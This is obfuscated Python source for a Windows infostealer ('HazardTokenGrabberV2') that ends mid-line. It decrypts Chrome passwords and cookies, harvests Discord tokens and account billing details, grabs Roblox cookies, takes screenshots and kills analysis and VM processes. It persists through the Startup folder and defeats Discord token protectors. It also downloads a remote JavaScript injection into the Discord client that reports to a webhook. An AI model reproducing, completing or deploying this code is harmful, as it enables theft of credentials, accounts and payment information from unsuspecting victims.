import os #line:1 import json #line:2 import httpx #line:3 import winreg #line:4 import ctypes #line:5 import shutil #line:6 import psutil #line:7 import asyncio #line:8 import sqlite3 #line:9 import zipfile #line:10 import threading #line:11 import subprocess #line:12 from sys import argv #line:14 from PIL import ImageGrab #line:15 from random import choice #line:16 from base64 import b64decode #line:17 from tempfile import mkdtemp #line:18 from re import findall ,match #line:19 from Crypto .Cipher import AES #line:20 from win32crypt import CryptUnprotectData #line:21 config ={'updateURL':b64decode (b64decode (b64decode ("WEBHOOK").decode ('utf-8')).decode ('utf-8')).decode ('utf-8'),'protection':"KEY_HERE",'updateBackup':b64decode ("aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL1JkaW1vL0Rpc2NvcmQtSW5qZWN0aW9uL21hc3Rlci9pbmplY3Rpb24uanM").decode ('utf-8'),'tryv3':True ,'tryv2':True ,'tryv1':True ,'debug':True ,'debugPrograms':["httpdebuggerui","wireshark","fiddler","regedit","cmd","taskmgr","vboxservice","df5serv","processhacker","vboxtray","vmtoolsd","vmwaretray","ida64","ollydbg","pestudio","vmwareuser","vgauthservice","vmacthlp","x96dbg","vmsrvc","x32dbg","vmusrvc","prl_cc","prl_tools","xenservice","qemu-ga","joeboxcontrol","ksdumperclient","ksdumper","joeboxserver"]}#line:74 Victim =os .getlogin ()#line:76 Victim_pc =os .getenv ("COMPUTERNAME")#line:77 ram =str (psutil .virtual_memory ()[0 ]/1024 **3 ).split (".")[0 ]#line:78 disk =str (psutil .disk_usage ('/')[0 ]/1024 **3 ).split (".")[0 ]#line:79 class Functions (object ):#line:82 @staticmethod #line:83 def get_headers (OO0O00O0000OOOO00 :str =None ):#line:84 O0OOOO00OOOO0OOO0 ={"Content-Type":"application/json",}#line:87 if OO0O00O0000OOOO00 :#line:88 O0OOOO00OOOO0OOO0 .update ({"Authorization":OO0O00O0000OOOO00 })#line:89 return O0OOOO00OOOO0OOO0 #line:90 @staticmethod #line:92 def get_master_key (OO00000O0000OO0OO )->str :#line:93 with open (OO00000O0000OO0OO ,"r",encoding ="utf-8")as OO0O00OO00OOOOOO0 :#line:94 O0OO0O0OOOOO0O0OO =OO0O00OO00OOOOOO0 .read ()#line:95 O00O00OOOOOO000OO =json .loads (O0OO0O0OOOOO0O0OO )#line:96 O00OOOO00O0000OOO =b64decode (O00O00OOOOOO000OO ["os_crypt"]["encrypted_key"])#line:98 O00OOOO00O0000OOO =O00OOOO00O0000OOO [5 :]#line:99 O00OOOO00O0000OOO =CryptUnprotectData (O00OOOO00O0000OOO ,None ,None ,None ,0 )[1 ]#line:100 return O00OOOO00O0000OOO #line:101 @staticmethod #line:103 def decrypt_val (O00OOOO00O00O0OOO ,O0O0OOO00OOOO00O0 )->str :#line:104 try :#line:105 O0OOOOOO000OO0O0O =O00OOOO00O00O0OOO [3 :15 ]#line:106 O00O0OOOOO0000O00 =O00OOOO00O00O0OOO [15 :]#line:107 O000OOO000OO0000O =AES .new (O0O0OOO00OOOO00O0 ,AES .MODE_GCM ,O0OOOOOO000OO0O0O )#line:108 OOOOO00O00000O0O0 =O000OOO000OO0000O .decrypt (O00O0OOOOO0000O00 )#line:109 OOOOO00O00000O0O0 =OOOOO00O00000O0O0 [:-16 ].decode ()#line:110 return OOOOO00O00000O0O0 #line:111 except Exception :#line:112 return "Failed to decrypt password"#line:113 @staticmethod #line:115 def fetch_conf (OOOO0OO00O0O0OOOO :str )->str or bool |None :#line:116 return config .get (OOOO0OO00O0O0OOOO )#line:117 class HazardTokenGrabberV2 (Functions ):#line:120 def __init__ (O00O0OOOOOOO0O00O ):#line:121 O00O0OOOOOOO0O00O .webhook =O00O0OOOOOOO0O00O .fetch_conf ('updateURL')#line:122 O00O0OOOOOOO0O00O .discordApi ="https://discord.com/api/v9/users/@me"#line:123 O00O0OOOOOOO0O00O .appdata =os .getenv ("localappdata")#line:124 O00O0OOOOOOO0O00O .roaming =os .getenv ("appdata")#line:125 O00O0OOOOOOO0O00O .chrome =O00O0OOOOOOO0O00O .appdata +"\\Google\\Chrome\\User Data\\"#line:126 O00O0OOOOOOO0O00O .dir =mkdtemp ()#line:127 O00O0OOOOOOO0O00O .startup_loc =O00O0OOOOOOO0O00O .roaming +"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"#line:128 O00O0OOOOOOO0O00O .hook_reg ="api/webhooks"#line:129 O00O0OOOOOOO0O00O .regex =r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}"#line:130 O00O0OOOOOOO0O00O .encrypted_regex =r"dQw4w9WgXcQ:[^\"]*"#line:131 O00O0OOOOOOO0O00O .sep =os .sep #line:133 O00O0OOOOOOO0O00O .tokens =[]#line:134 O00O0OOOOOOO0O00O .robloxcookies =[]#line:135 os .makedirs (O00O0OOOOOOO0O00O .dir ,exist_ok =True )#line:137 def try_extract (O00O0O0000O0O00OO ):#line:139 def O00OO00OO0O0O000O (*O00000OOOO0OO000O ,**OO0OOO0OOO000OOOO ):#line:140 try :#line:141 O00O0O0000O0O00OO (*O00000OOOO0OO000O ,**OO0OOO0OOO000OOOO )#line:142 except Exception :#line:143 pass #line:144 return O00OO00OO0O0O000O #line:145 async def checkToken (O0OO00OOO0O000O0O ,O0OO00OOOO0O0OO00 :str )->str :#line:147 try :#line:148 O0O000OOO0O000OO0 =httpx .get (url =O0OO00OOO0O000O0O .discordApi ,headers =O0OO00OOO0O000O0O .get_headers (O0OO00OOOO0O0OO00 ),timeout =5.0 )#line:153 except (httpx ._exceptions .ConnectTimeout ,httpx ._exceptions .TimeoutException ):#line:154 pass #line:155 if O0O000OOO0O000OO0 .status_code ==200 and O0OO00OOOO0O0OO00 not in O0OO00OOO0O000O0O .tokens :#line:156 O0OO00OOO0O000O0O .tokens .append (O0OO00OOOO0O0OO00 )#line:157 async def init (O000O000OO0O000OO ):#line:159 if O000O000OO0O000OO .fetch_conf ('debug')and AntiDebug ().inVM :#line:160 os ._exit (0 )#line:161 await O000O000OO0O000OO .bypassBetterDiscord ()#line:162 await O000O000OO0O000OO .bypassTokenProtector ()#line:163 OO0O0OO0OO00O0O0O =[O000O000OO0O000OO .screenshot ,O000O000OO0O000OO .grab_tokens ,O000O000OO0O000OO .grabRobloxCookie ]#line:164 if O000O000OO0O000OO .fetch_conf ('tryv1'):#line:165 OO0O0OO0OO00O0O0O .append (O000O000OO0O000OO .hide )#line:166 if O000O000OO0O000OO .fetch_conf ('tryv3'):#line:168 await O000O000OO0O000OO .killProcesses ()#line:169 if O000O000OO0O000OO .fetch_conf ('tryv2'):#line:171 OO0O0OO0OO00O0O0O .append (O000O000OO0O000OO .startup )#line:172 if os .path .exists (O000O000OO0O000OO .chrome +'Default')and os .path .exists (O000O000OO0O000OO .chrome +'Local State'):#line:174 OO0O0OO0OO00O0O0O .append (O000O000OO0O000OO .grabPassword )#line:175 OO0O0OO0OO00O0O0O .append (O000O000OO0O000OO .grabCookies )#line:176 for OOOOOOOOO0OO0OOOO in OO0O0OO0OO00O0O0O :#line:178 OO0O0O0OO00O0OOO0 =threading .Thread (target =OOOOOOOOO0OO0OOOO ,daemon =True )#line:179 OO0O0O0OO00O0OOO0 .start ()#line:180 for O0O0O0OOOOO0O0O0O in threading .enumerate ():#line:181 try :#line:182 O0O0O0OOOOO0O0O0O .join ()#line:183 except RuntimeError :#line:184 continue #line:185 O000O000OO0O000OO .neatifyTokens ()#line:186 await O000O000OO0O000OO .injector ()#line:187 O000O000OO0O000OO .finish ()#line:188 shutil .rmtree (O000O000OO0O000OO .dir )#line:189 def hide (OOO0OO00OO000000O ):#line:191 ctypes .windll .kernel32 .SetFileAttributesW (argv [0 ],2 )#line:192 def startup (O000O00OO0OOO0OO0 ):#line:194 try :#line:195 shutil .copy2 (argv [0 ],O000O00OO0OOO0OO0 .startup_loc )#line:196 except Exception :#line:197 pass #line:198 async def injector (OO00O0O00OOOOO0O0 ):#line:200 for _O0O00O00OOOOO0O00 in os .listdir (OO00O0O00OOOOO0O0 .appdata ):#line:201 if 'discord'in _O0O00O00OOOOO0O00 .lower ():#line:202 OOOOOOO0000O0O00O =OO00O0O00OOOOO0O0 .appdata +OO00O0O00OOOOO0O0 .sep +_O0O00O00OOOOO0O00 #line:203 OOO0OO000OOO00000 =OOOOOOO0000O0O00O +OO00O0O00OOOOO0O0 .sep #line:204 for __OO00O0000O0OO0000 in os .listdir (os .path .abspath (OOOOOOO0000O0O00O )):#line:205 if match (r'app-(\d*\.\d*)*',__OO00O0000O0OO0000 ):#line:206 OOO0OOO0O0OOO00OO =os .path .abspath (OOO0OO000OOO00000 +__OO00O0000O0OO0000 )#line:207 O0O000OOO00O0O0OO =OOO0OOO0O0OOO00OO +'\\modules\\discord_desktop_core-3\\discord_desktop_core\\'#line:208 if os .path .exists (O0O000OOO00O0O0OO ):#line:209 if OO00O0O00OOOOO0O0 .startup_loc not in argv [0 ]:#line:210 try :#line:211 os .makedirs (O0O000OOO00O0O0OO +'initiation',exist_ok =True )#line:213 except PermissionError :#line:214 pass #line:215 if OO00O0O00OOOOO0O0 .hook_reg in OO00O0O00OOOOO0O0 .webhook :#line:216 O0OO0O000OOO00000 =httpx .get (OO00O0O00OOOOO0O0 .fetch_conf ('updateBackup')).text .replace ("%WEBHOOK%",OO00O0O00OOOOO0O0 .webhook )#line:217 else :#line:218 O0OO0O000OOO00000 =httpx .get (OO00O0O00OOOOO0O0 .fetch_conf ('updateBackup')).text .replace ("%WEBHOOK%",OO00O0O00OOOOO0O0 .webhook ).replace ("%WEBHOOK_KEY%",OO00O0O00OOOOO0O0 .fetch_conf ('protection'))#line:221 try :#line:222 with open (O0O000OOO00O0O0OO +'index.js','w',errors ="ignore")as O00000000O0O00O0O :#line:223 O00000000O0O00O0O .write (O0OO0O000OOO00000 )#line:224 except PermissionError :#line:225 pass #line:226 if OO00O0O00OOOOO0O0 .fetch_conf ('tryv3'):#line:227 os .startfile (OOO0OOO0O0OOO00OO +OO00O0O00OOOOO0O0 .sep +_O0O00O00OOOOO0O00 +'.exe')#line:228 async def killProcesses (O00O0O0000O0O0OOO ):#line:230 O0OO000OOOO000OO0 =O00O0O0000O0O0OOO .fetch_conf ('debugPrograms')#line:231 for OOOOO0O000O0OOOOO in ['discord','discordtokenprotector','discordcanary','discorddevelopment','discordptb']:#line:232 O0OO000OOOO000OO0 .append (OOOOO0O000O0OOOOO )#line:233 for O0000OO0OO000O0O0 in psutil .process_iter ():#line:234 if any (OO00OO000OOOO0O00 in O0000OO0OO000O0O0 .name ().lower ()for OO00OO000OOOO0O00 in O0OO000OOOO000OO0 ):#line:235 try :#line:236 O0000OO0OO000O0O0 .kill ()#line:237 except (psutil .NoSuchProcess ,psutil .AccessDenied ):#line:238 pass #line:239 async def bypassTokenProtector (OO00OOO0OO0OOO00O ):#line:241 O0O0O0OOOOO00O000 =f"{OO00OOO0OO0OOO00O.roaming}\\DiscordTokenProtector\\"#line:243 if not os .path .exists (O0O0O0OOOOO00O000 ):#line:244 return #line:245 O00O000OOO0OOO000 =O0O0O0OOOOO00O000 +"config.json"#line:246 for O0O0O0OO0O0O000O0 in ["DiscordTokenProtector.exe","ProtectionPayload.dll","secure.dat"]:#line:248 try :#line:249 os .remove (O0O0O0OOOOO00O000 +O0O0O0OO0O0O000O0 )#line:250 except FileNotFoundError :#line:251 pass #line:252 if os .path .exists (O00O000OOO0OOO000 ):#line:253 with open (O00O000OOO0OOO000 ,errors ="ignore")as OOO0OO0OOO0000OO0 :#line:254 try :#line:255 OO0O00000O0O00O00 =json .load (OOO0OO0OOO0000OO0 )#line:256 except json .decoder .JSONDecodeError :#line:257 return #line:258 OO0O00000O0O00O00 ['Rdimo_just_shit_on_this_token_protector']="https://github.com/Rdimo"#line:259 OO0O00000O0O00O00 ['auto_start']=False #line:260 OO0O00000O0O00O00 ['auto_start_discord']=False #line:261 OO0O00000O0O00O00 ['integrity']=False #line:262 OO0O00000O0O00O00 ['integrity_allowbetterdiscord']=False #line:263 OO0O00000O0O00O00 ['integrity_checkexecutable']=False #line:264 OO0O00000O0O00O00 ['integrity_checkhash']=False #line:265 OO0O00000O0O00O00 ['integrity_checkmodule']=False #line:266 OO0O00000O0O00O00 ['integrity_checkscripts']=False #line:267 OO0O00000O0O00O00 ['integrity_checkresource']=False #line:268 OO0O00000O0O00O00 ['integrity_redownloadhashes']=False #line:269 OO0O00000O0O00O00 ['iterations_iv']=364 #line:270 OO0O00000O0O00O00 ['iterations_key']=457 #line:271 OO0O00000O0O00O00 ['version']=69420 #line:272 with open (O00O000OOO0OOO000 ,'w')as OOO0OO0OOO0000OO0 :#line:273 json .dump (OO0O00000O0O00O00 ,OOO0OO0OOO0000OO0 ,indent =2 ,sort_keys =True )#line:274 with open (O00O000OOO0OOO000 ,'a')as OOO0OO0OOO0000OO0 :#line:275 OOO0OO0OOO0000OO0 .write ("\n\n//Rdimo just shit on this token protector | https://github.com/Rdimo")#line:276 async def bypassBetterDiscord (O00OO00O0O00O0000 ):#line:278 O00OO000OOO000OO0 =O00OO00O0O00O0000 .roaming +"\\BetterDiscord\\data\\betterdiscord.asar"#line:279 if os .path .exists (O00OO000OOO000OO0 ):#line:280 O0OOO0OOO0OOO0OOO =O00OO00O0O00O0000 .hook_reg #line:281 with open (O00OO000OOO000OO0 ,'r',encoding ="cp437",errors ='ignore')as OOOOOOOOOO000OOO0 :#line:282 O0000O0OO0000O000 =OOOOOOOOOO000OOO0 .read ()#line:283 O0OO00OOOOO0OOOOO =O0000O0OO0000O000 .replace (O0OOO0OOO0OOO0OOO ,'RdimoTheGoat')#line:284 with open (O00OO000OOO000OO0 ,'w',newline ='',encoding ="cp437",errors ='ignore')as OOOOOOOOOO000OOO0 :#line:285 OOOOOOOOOO000OOO0 .write (O0OO00OOOOO0OOOOO )#line:286 def getProductValues (OOO000OOOO00OOOOO ):#line:288 try :#line:289 O0O0O0O0000O00OOO =subprocess .check_output (r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault",creationflags =0x08000000 ).decode ().rstrip ()#line:292 except Exception :#line:293 O0O0O0O0000O00OOO ="N/A (Likely Pirated)"#line:294 try :#line:295 OOO0000000OO000O0 =subprocess .check_output (r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName",creationflags =0x08000000 ).decode ().rstrip ()#line:297 except Exception :#line:298 OOO0000000OO000O0 ="N/A"#line:299 return [OOO0000000OO000O0 ,O0O0O0O0000O00OOO ]#line:300 @try_extract #line:302 def grab_tokens (O0O00O0000OOO00OO ):#line:303 O0O0O000O0OO000O0 ={'Discord':O0O00O0000OOO00OO .roaming +'\\discord\\Local Storage\\leveldb\\','Discord Canary':O0O00O0000OOO00OO .roaming +'\\discordcanary\\Local Storage\\leveldb\\','Lightcord':O0O00O0000OOO00OO .roaming +'\\Lightcord\\Local Storage\\leveldb\\','Discord PTB':O0O00O0000OOO00OO .roaming +'\\discordptb\\Local Storage\\leveldb\\','Opera':O0O00O0000OOO00OO .roaming +'\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\','Opera GX':O0O00O0000OOO00OO .roaming +'\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\','Amigo':O0O00O0000OOO00OO .appdata +'\\Amigo\\User Data\\Local Storage\\leveldb\\','Torch':O0O00O0000OOO00OO .appdata +'\\Torch\\User Data\\Local Storage\\leveldb\\','Kometa':O0O00O0000OOO00OO .appdata +'\\Kometa\\User Data\\Local Storage\\leveldb\\','Orbitum':O0O00O0000OOO00OO .appdata +'\\Orbitum\\User Data\\Local Storage\\leveldb\\','CentBrowser':O0O00O0000OOO00OO .appdata +'\\CentBrowser\\User Data\\Local Storage\\leveldb\\','7Star':O0O00O0000OOO00OO .appdata +'\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\','Sputnik':O0O00O0000OOO00OO .appdata +'\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\','Vivaldi':O0O00O0000OOO00OO .appdata +'\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\','Chrome SxS':O0O00O0000OOO00OO .appdata +'\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\','Chrome':O0O00O0000OOO00OO .chrome +'Default\\Local Storage\\leveldb\\','Epic Privacy Browser':O0O00O0000OOO00OO .appdata +'\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\','Microsoft Edge':O0O00O0000OOO00OO .appdata +'\\Microsoft\\Edge\\User Data\\Defaul\\Local Storage\\leveldb\\','Uran':O0O00O0000OOO00OO .appdata +'\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\','Yandex':O0O00O0000OOO00OO .appdata +'\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\','Brave':O0O00O0000OOO00OO .appdata +'\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\','Iridium':O0O00O0000OOO00OO .appdata +'\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\'}#line:327 for O0OOO0O0000000O0O ,O0000OO0OOOO0OOOO in O0O0O000O0OO000O0 .items ():#line:329 if not os .path .exists (O0000OO0OOOO0OOOO ):#line:330 continue #line:331 O00O0000O0OOOOOOO =O0OOO0O0000000O0O .replace (" ","").lower ()#line:332 if "cord"in O0000OO0OOOO0OOOO :#line:333 if os .path .exists (O0O00O0000OOO00OO .roaming +f'\\{O00O0000O0OOOOOOO}\\Local State'):#line:334 for O00OO00OOOO000OO0 in os .listdir (O0000OO0OOOO0OOOO ):#line:335 if O00OO00OOOO000OO0 [-3 :]not in ["log","ldb"]:#line:336 continue #line:337 for O0OO00O0O0O0OOO00 in [O00O0OOOO000O0000 .strip ()for O00O0OOOO000O0000 in open (f'{O0000OO0OOOO0OOOO}\\{O00OO00OOOO000OO0}',errors ='ignore').readlines ()if O00O0OOOO000O0000 .strip ()]:#line:338 for OOOOOOO00O0OOOO00 in findall (O0O00O0000OOO00OO .encrypted_regex ,O0OO00O0O0O0OOO00 ):#line:339 OOOOOO0OOOOOO0000 =O0O00O0000OOO00OO .decrypt_val (b64decode (OOOOOOO00O0OOOO00 .split ('dQw4w9WgXcQ:')[1 ]),O0O00O0000OOO00OO .get_master_key (O0O00O0000OOO00OO .roaming +f'\\{O00O0000O0OOOOOOO}\\Local State'))#line:340 asyncio .run (O0O00O0000OOO00OO .checkToken (OOOOOO0OOOOOO0000 ))#line:341 else :#line:342 for O00OO00OOOO000OO0 in os .listdir (O0000OO0OOOO0OOOO ):#line:343 if O00OO00OOOO000OO0 [-3 :]not in ["log","ldb"]:#line:344 continue #line:345 for O0OO00O0O0O0OOO00 in [O00O0O0O00OOO00OO .strip ()for O00O0O0O00OOO00OO in open (f'{O0000OO0OOOO0OOOO}\\{O00OO00OOOO000OO0}',errors ='ignore').readlines ()if O00O0O0O00OOO00OO .strip ()]:#line:346 for OOOOOO0OOOOOO0000 in findall (O0O00O0000OOO00OO .regex ,O0OO00O0O0O0OOO00 ):#line:347 asyncio .run (O0O00O0000OOO00OO .checkToken (OOOOOO0OOOOOO0000 ))#line:348 if os .path .exists (O0O00O0000OOO00OO .roaming +"\\Mozilla\\Firefox\\Profiles"):#line:350 for O0000OO0OOOO0OOOO ,_O00OO0O00OOOO0OOO ,OO0O0OOO00OOOO000 in os .walk (O0O00O0000OOO00OO .roaming +"\\Mozilla\\Firefox\\Profiles"):#line:351 for _O000OO0OOO00OO00O in OO0O0OOO00OOOO000 :#line:352 if not _O000OO0OOO00OO00O .endswith ('.sqlite'):#line:353 continue #line:354 for O0OO00O0O0O0OOO00 in [O00O0OO000OO0O0OO .strip ()for O00O0OO000OO0O0OO in open (f'{O0000OO0OOOO0OOOO}\\{_O000OO0OOO00OO00O}',errors ='ignore').readlines ()if O00O0OO000OO0O0OO .strip ()]:#line:355 for OOOOOO0OOOOOO0000 in findall (O0O00O0000OOO00OO .regex ,O0OO00O0O0O0OOO00 ):#line:356 asyncio .run (O0O00O0000OOO00OO .checkToken (OOOOOO0OOOOOO0000 ))#line:357 @try_extract #line:359 def grabPassword (O000OOOOO0OO0OOOO ):#line:360 OOOOOO0000O00O0O0 =O000OOOOO0OO0OOOO .get_master_key (O000OOOOO0OO0OOOO .chrome +'Local State')#line:361 OOO00OOOOO00O00OO =O000OOOOO0OO0OOOO .chrome +'default\\Login Data'#line:362 OOO0OO000OO0OO000 =O000OOOOO0OO0OOOO .dir +O000OOOOO0OO0OOOO .sep +"Loginvault1.db"#line:363 shutil .copy2 (OOO00OOOOO00O00OO ,OOO0OO000OO0OO000 )#line:365 O000OO00O0O0O0OOO =sqlite3 .connect (OOO0OO000OO0OO000 )#line:366 OO0OOO00OO0OOO0OO =O000OO00O0O0O0OOO .cursor ()#line:367 with open (O000OOOOO0OO0OOOO .dir +"\\Google Passwords.txt","w",encoding ="cp437",errors ='ignore')as O00OOO0O000OOOOOO :#line:368 OO0OOO00OO0OOO0OO .execute ("SELECT action_url, username_value, password_value FROM logins")#line:369 for O0O00OO000OO00OOO in OO0OOO00OO0OOO0OO .fetchall ():#line:370 OO00000OO0O0O00O0 =O0O00OO000OO00OOO [0 ]#line:371 O0OO0O0O00OOOO0OO =O0O00OO000OO00OOO [1 ]#line:372 O000O0O0OO0000O0O =O0O00OO000OO00OOO [2 ]#line:373 O0OOOOOOO00000000 =O000OOOOO0OO0OOOO .decrypt_val (O000O0O0OO0000O0O ,OOOOOO0000O00O0O0 )#line:374 if OO00000OO0O0O00O0 !="":#line:375 O00OOO0O000OOOOOO .write (f"Domain: {OO00000OO0O0O00O0}\nUser: {O0OO0O0O00OOOO0OO}\nPass: {O0OOOOOOO00000000}\n\n")#line:376 OO0OOO00OO0OOO0OO .close ()#line:377 O000OO00O0O0O0OOO .close ()#line:378 os .remove (OOO0OO000OO0OO000 )#line:379 @try_extract #line:381 def grabCookies (OO00OOO0O0000O000 ):#line:382 OO00000OOO0OOO0OO =OO00OOO0O0000O000 .get_master_key (OO00OOO0O0000O000 .chrome +'Local State')#line:383 O00O00OOO000O0OOO =OO00OOO0O0000O000 .chrome +'default\\Network\\cookies'#line:384 O0O0O0O000OO0000O =OO00OOO0O0000O000 .dir +OO00OOO0O0000O000 .sep +"Loginvault2.db"#line:385 shutil .copy2 (O00O00OOO000O0OOO ,O0O0O0O000OO0000O )#line:387 O0O000O00O0O0OOO0 =sqlite3 .connect (O0O0O0O000OO0000O )#line:388 OOOO0O000OO00OOO0 =O0O000O00O0O0OOO0 .cursor ()#line:389 with open (OO00OOO0O0000O000 .dir +"\\Google Cookies.txt","w",encoding ="cp437",errors ='ignore')as O000OOO0OO0000O0O :#line:390 OOOO0O000OO00OOO0 .execute ("SELECT host_key, name, encrypted_value from cookies")#line:391 for OOO0OO0O0O000O0O0 in OOOO0O000OO00OOO0 .fetchall ():#line:392 O000O00O000O0OOOO =OOO0OO0O0O000O0O0 [0 ]#line:393 O0OOOOO000O0000O0 =OOO0OO0O0O000O0O0 [1 ]#line:394 O0OOO00O00OOOOO00 =OO00OOO0O0000O000 .decrypt_val (OOO0OO0O0O000O0O0 [2 ],OO00000OOO0OOO0OO )#line:395 if O000O00O000O0OOOO !="":#line:396 O000OOO0OO0000O0O .write (f"Host: {O000O00O000O0OOOO}\nUser: {O0OOOOO000O0000O0}\nCookie: {O0OOO00O00OOOOO00}\n\n")#line:397 if '_|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_'in O0OOO00O00OOOOO00 :#line:398 OO00OOO0O0000O000 .robloxcookies .append (O0OOO00O00OOOOO00 )#line:399 OOOO0O000OO00OOO0 .close ()#line:400 O0O000O00O0O0OOO0 .close ()#line:401 os .remove (O0O0O0O000OO0000O )#line:402 def neatifyTokens (O000O0O00OO0O000O ):#line:404 O00O0O0O00OO00OOO =open (O000O0O00OO0O000O .dir +"\\Discord Info.txt","w",encoding ="cp437",errors ='ignore')#line:405 for OOOO0O00OO000O0OO in O000O0O00OO0O000O .tokens :#line:406 OOOO0OOO00000OO0O =httpx .get (O000O0O00OO0O000O .discordApi ,headers =O000O0O00OO0O000O .get_headers (OOOO0O00OO000O0OO )).json ()#line:407 OOO0OO00000O00OO0 =OOOO0OOO00000OO0O .get ('username')+'#'+str (OOOO0OOO00000OO0O .get ("discriminator"))#line:408 O000O0OO0O000OOOO =""#line:410 OO00OOO0OOOOO0O0O =OOOO0OOO00000OO0O ['flags']#line:411 if (OO00OOO0OOOOO0O0O ==1 ):#line:412 O000O0OO0O000OOOO +="Staff, "#line:413 if (OO00OOO0OOOOO0O0O ==2 ):#line:414 O000O0OO0O000OOOO +="Partner, "#line:415 if (OO00OOO0OOOOO0O0O ==4 ):#line:416 O000O0OO0O000OOOO +="Hypesquad Event, "#line:417 if (OO00OOO0OOOOO0O0O ==8 ):#line:418 O000O0OO0O000OOOO +="Green Bughunter, "#line:419 if (OO00OOO0OOOOO0O0O ==64 ):#line:420 O000O0OO0O000OOOO +="Hypesquad Bravery, "#line:421 if (OO00OOO0OOOOO0O0O ==128 ):#line:422 O000O0OO0O000OOOO +="HypeSquad Brillance, "#line:423 if (OO00OOO0OOOOO0O0O ==256 ):#line:424 O000O0OO0O000OOOO +="HypeSquad Balance, "#line:425 if (OO00OOO0OOOOO0O0O ==512 ):#line:426 O000O0OO0O000OOOO +="Early Supporter, "#line:427 if (OO00OOO0OOOOO0O0O ==16384 ):#line:428 O000O0OO0O000OOOO +="Gold BugHunter, "#line:429 if (OO00OOO0OOOOO0O0O ==131072 ):#line:430 O000O0OO0O000OOOO +="Verified Bot Developer, "#line:431 if (O000O0OO0O000OOOO ==""):#line:432 O000O0OO0O000OOOO ="None"#line:433 OO00OOOOOO0O00000 =OOOO0OOO00000OO0O .get ("email")#line:434 O0OO0OO00OOOOO00O =OOOO0OOO00000OO0O .get ("phone")if OOOO0OOO00000OO0O .get ("phone")else "No Phone Number attached"#line:436 OO0OO000OOOOOOO0O =httpx .get (O000O0O00OO0O000O .discordApi +'/billing/subscriptions',headers =O000O0O00OO0O000O .get_headers (OOOO0O00OO000O0OO )).json ()#line:437 OO00OO0OO00000OOO =False #line:438 OO00OO0OO00000OOO =bool (len (OO0OO000OOOOOOO0O )>0 )#line:439 O0OO0OO0O00O0O0OO =bool (len (json .loads (httpx .get (O000O0O00OO0O000O .discordApi +"/billing/payment-sources",headers =O000O0O00OO0O000O .get_headers (OOOO0O00OO000O0OO )).text ))>0 )#line:440 O00O0O0O00OO00OOO .write (f"{' '*17}{OOO0OO00000O00OO0}\n{'-'*50}\nToken: {OOOO0O00OO000O0OO}\nHas Billing: {O0OO0OO0O00O0O0OO}\nNitro: {OO00OO0OO00000OOO}\nBadges: {O000O0OO0O000OOOO}\nEmail: {OO00OOOOOO0O00000}\nPhone: {O0OO0OO00OOOOO00O}\n\n")#line:441 O00O0O0O00OO00OOO .close ()#line:442 def grabRobloxCookie (O0O0OOOOOOO000OO0 ):#line:444 def OO0OO0OOO0OOO0OOO (O0O0OO00O0000O000 ):#line:445 try :#line:446 return subprocess .check_output (fr"powershell Get-ItemPropertyValue -Path {O0O0OO00O0000O000}:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY",creationflags =0x08000000 ).decode ().rstrip ()#line:449 except Exception :#line:450 return None #line:451 OO00000OOOOO000O0 =OO0OO0OOO0OOO0OOO (r'HKLM')#line:452 if not OO00000OOOOO000O0 :#line:453 OO00000OOOOO000O0 =OO0OO0OOO0OOO0OOO (r'HKCU')#line:454 if OO00000OOOOO000O0 :#line:455 O0O0OOOOOOO000OO0 .robloxcookies .append (OO00000OOOOO000O0 )#line:456 if O0O0OOOOOOO000OO0 .robloxcookies :#line:457 with open (O0O0OOOOOOO000OO0 .dir +"\\Roblox Cookies.txt","w")as OOOO00OO0O00OO00O :#line:458 for O0OOO000OOO0O0O00 in O0O0OOOOOOO000OO0 .robloxcookies :#line:459 OOOO00OO0O00OO00O .write (O0OOO000OOO0O0O00 +'\n')#line:460 def screenshot (OO00OOO0OOO0OOOO0 ):#line:462 OO000000O0O0OO0OO =ImageGrab .grab (bbox =None ,include_layered_windows =False ,all_screens =True ,xdisplay =None )#line:468 OO000000O0O0OO0OO .save (OO00OOO0OOO0OOOO0 .dir +"\\Screenshot.png")#line:469 OO000000O0O0OO0OO .close ()#line:470 def finish (O0OO0OOOO0OOOO000 ):#line:472 for OOOOOO0OO00OOOOOO in os .listdir (O0OO0OOOO0OOOO000 .dir ):#line:473 if OOOOOO0OO00OOOOOO .endswith ('.txt'):#line:474 OOOO0OO000O0OOO0O =O0OO0OOOO0OOOO000 .dir +O0OO0OOOO0OOOO000 .sep +OOOOOO0OO00OOOOOO #line:475 with open (OOOO0OO000O0OOO0O ,"r",errors ="ignore")as O0O00OO00O000OOOO :#line:476 OO00OO0000OOO000O =O0O00OO00O000OOOO .read ()#line:477 if not OO00OO0000OOO000O :#line:478 O0O00OO00O000OOOO .close ()#line:479 os .remove (OOOO0OO000O0OOO0O )#line:480 else :#line:481 with open (OOOO0OO000O0OOO0O ,"w",encoding ="utf-8",errors ="ignore")as O00O00OO0OOO00000 :#line:482 O00O00OO0OOO00000 .write ("🌟・Grabber by Quartz\n\n")#line:483 with open (OOOO0OO000O0OOO0O ,"a",encoding ="utf-8",errors ="ignore")as O00O0O000000OOOOO :#line:484 O00O0O000000OOOOO .write (OO00OO0000OOO000O +"\n\n🌟・Grabber by Quartz")#line:485 O00O0O00OO00O00OO =O0OO0OOOO0OOOO000 .getProductValues ()#line:487 O0OOO0O0000OOOO00 =O00O0O00OO00O00OO [0 